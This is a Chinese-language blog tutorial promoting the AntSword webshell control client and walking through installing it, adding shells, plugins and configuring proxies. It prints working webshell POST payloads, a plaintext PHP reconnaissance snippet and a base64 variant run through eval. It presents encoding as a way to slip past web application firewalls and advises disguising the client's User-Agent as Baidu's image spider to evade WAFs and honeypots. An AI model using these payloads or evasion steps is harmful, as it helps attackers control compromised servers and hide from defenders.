中国蚁剑--比菜刀更牛的shell控制端

项目地址:https://github.com/AntSwordProject/
1,它是开源的
2,它的拓展性很强大
3,它可以跨平台使用
中文说明书:https://doc.u0u.us/zh-hans/

Lily_Screenshot_1545072983.png

====================================

1,安装
要下载两个部分,一个是项目核心源码,一个是加载器
项目源码就是一份
加载器则分为三个版本MAC,windows,LINUX
Lily_Screenshot_1545072695.png
Lily_Screenshot_1545072744.png

我们打开加载器
第一次需要安装项目,如果你下载了核心源码,就选择项目源码的文件夹(如果只下载了加载器,选择一个空文件夹,加载器会自动帮你下载核心项目源码)
注意:这个项目文件夹就是你日后需要备份的,存储着你的shell和shell内的资料
Lily_Screenshot_1545072865.png

2,使用
跟菜刀几乎差不多,但是功能更强大一些
比如插件市场,可以安装一些插件
Lily_Screenshot_1545073155.png

添加一个shell
Lily_Screenshot_1545073424.png
php推荐使用chr加密
如果需要自己写加密类型,见下图
Lily_Screenshot_1545073687.png
还可以配置shell的请求信息和post内容
Lily_Screenshot_1545073545.png

还可以配置全局代理
Lily_Screenshot_1545073816.png

3,关于编码
这是这个程序的过人之处
用编码可以轻松绕过WAF
我们来对比一下默认不使用编码传输和base64编码传输
Lily_Screenshot_1545074313.png
Lily_Screenshot_1545074319.png

明文传输,post内容为

ant=@ini_set("display_errors", "0");@set_time_limit(0);echo "3e231";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}    ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="    ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="    {$s}";echo $R;;echo "8e51f";die();

base64加密传输,post内容为

_0x4ee8506e59871=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZWNobyAiNzk1ODAiOyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk/QHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk/JHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOztlY2hvICIwOWE3ZSI7ZGllKCk7&ant=@eval(@base64_decode($_POST[_0x4ee8506e59871]));

其中,ant参数名称是shell密码

再来看看chr编码传输,完全就全部编码了
Lily_Screenshot_1545075255.png

4,修改
要注意的是
软件默认的user-agent是
User-Agent: antSword/v2.0
大部分人都不会去自定义useragent
这就给waf和蜜罐白送了一个特征
所以我们要修改一下源代码
修改项目内
antSword-2.0.2\modules\request.js (17行一处)
antSword-2.0.2\modules\update.js (两处)

Baiduspider-image
我改成列百度图片蜘蛛

5,插件
插件有很多,下载后都是到本地到
插件也都是开源的
这里有一个比较有特色的,超级终端
下面是演示的视频demo
https://v.youku.com/v_show/id_XMzc0MzgzOTU1Mg==.html

6,bug
经常会遇到下面这样的问题
就需要多连几次,或者把响应时间调大
Lily_Screenshot_1545111772.png

发表新评论